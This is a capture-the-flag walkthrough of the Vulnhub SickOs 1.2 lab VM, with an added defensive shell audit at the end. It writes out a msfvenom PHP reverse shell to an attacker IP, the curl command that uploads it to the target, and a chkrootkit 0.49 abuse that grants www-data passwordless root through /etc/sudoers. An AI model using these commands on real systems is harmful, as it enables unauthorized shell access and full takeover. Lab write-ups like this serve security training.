Another day, another CTF (capture the flag). If you have no projects, you had better sharpen your skills playing CTFs :p. This time it's called SickOs:1.2, from Vulnhub.

1. Service Discovery

We started off by using nmap to scan all TCP ports.


Two TCP ports are open, 22 and 80, and there is nothing interesting on SSH. Usually I proceed to scan UDP as well, but I was too lazy; I wanted to see how fast I could finish this.

2. Enumeration

Nothing interesting on port 22, so let's jump ahead and see what is on port 80.

2.2. Port 80 HTTP

Let's take a look at port 80. We start with Nikto.


Nothing special here; let's see what it looks like from the web browser.


All I see is the dude from The Matrix. Alright, I thought so too, Neo. Next we'll fire up DirBuster.


I can see that there is a directory called test; let's enumerate it further.


Very nice, it looks like I can upload files to this directory. I'll upload an msfvenom payload, generated with this command:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=443 -f raw > tai.php

Next, upload the file tai.php using curl (I love curl):

curl --upload-file tai.php http://192.168.0.106/test/tai.php -0 --http1.0

and the file is successfully uploaded.


Do not pay attention to the other files; those are my experiments. It took me a while to figure out that the reverse shell only works on port 443 😀

3. Exploitation

The next step is to set up a multi/handler listener in Metasploit and click on the uploaded file.


We have a Meterpreter session and drop down into a shell, but unfortunately it is only a shell with limited privileges. We need to escalate our privileges to root, so let's enumerate further from here.


We can see that the target machine is running Ubuntu Linux on a 3.11 kernel, with a fancy banner. As usual, at this point I upload and run linuxprivchecker.py; the complete result can be seen here.

After spending hours searching exploit-db.com for vulnerabilities and doing some more enumeration, I found that the target machine is running chkrootkit version 0.49, which is vulnerable. After checking the scheduled cron jobs I can see that it runs daily. The next step is to run this command:


echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

After several minutes I ran sudo su for root privileges,


and captured the flag, which is located in the /root directory.

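As an added example (not part of the original write-up), here is a small POSIX shell audit written from the defender's side for the conditions the escalation above depends on: a chkrootkit of version 0.49 or older, the /tmp/update file its cron run executes as root, and a sudoers entry granting NOPASSWD: ALL. The file paths are parameters and the demo files at the bottom are constructed, so it runs offline.

```shell
#!/bin/sh
# Added audit script, not from the original write-up. Checks the three conditions
# the chkrootkit 0.49 escalation relies on; paths are parameters so the checks
# can be exercised against the constructed files at the bottom.

# True (exit 0) when a numeric version string is 0.49 or older.
chkrootkit_version_vulnerable() {
    major="${1%%.*}"
    rest="${1#*.}"
    minor="${rest%%.*}"
    [ "$major" -eq 0 ] 2>/dev/null && [ "$minor" -le 49 ] 2>/dev/null
}

# True when the file that old chkrootkit versions execute as root exists.
update_hook_present() {
    [ -e "$1" ]
}

# Prints sudoers lines (comment lines excluded) that grant NOPASSWD: ALL.
sudoers_nopasswd_all() {
    grep -E '^[^#]*NOPASSWD:[[:space:]]*ALL' "$1" 2>/dev/null
}

# Reports each finding on stderr and prints the finding count on stdout.
audit() {
    ver="$1"; hook="$2"; sudoers="$3"; n=0
    if chkrootkit_version_vulnerable "$ver"; then
        echo "FINDING: chkrootkit $ver is 0.49 or older; its cron run executes $hook as root" >&2
        n=$((n + 1))
    fi
    if update_hook_present "$hook"; then
        echo "FINDING: $hook exists; inspect its contents and owner before the next cron run" >&2
        n=$((n + 1))
    fi
    if lines=$(sudoers_nopasswd_all "$sudoers") && [ -n "$lines" ]; then
        printf 'FINDING: %s grants NOPASSWD: ALL:\n%s\n' "$sudoers" "$lines" >&2
        n=$((n + 1))
    fi
    echo "$n"
}

# Constructed demo: stand-ins for /tmp/update and /etc/sudoers on a host hit as
# above. On a real host pass the version printed by chkrootkit -V plus the real paths.
demo=$(mktemp -d)
printf 'chmod 777 /etc/sudoers\n' > "$demo/update"
printf 'root ALL=(ALL) ALL\nwww-data ALL=NOPASSWD: ALL\n' > "$demo/sudoers"
echo "findings: $(audit 0.49 "$demo/update" "$demo/sudoers")"
rm -rf "$demo"
```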


4. Conclusion

Nice VM, I learnt some new techniques. Thanks D4rk36 and Vulnhub!
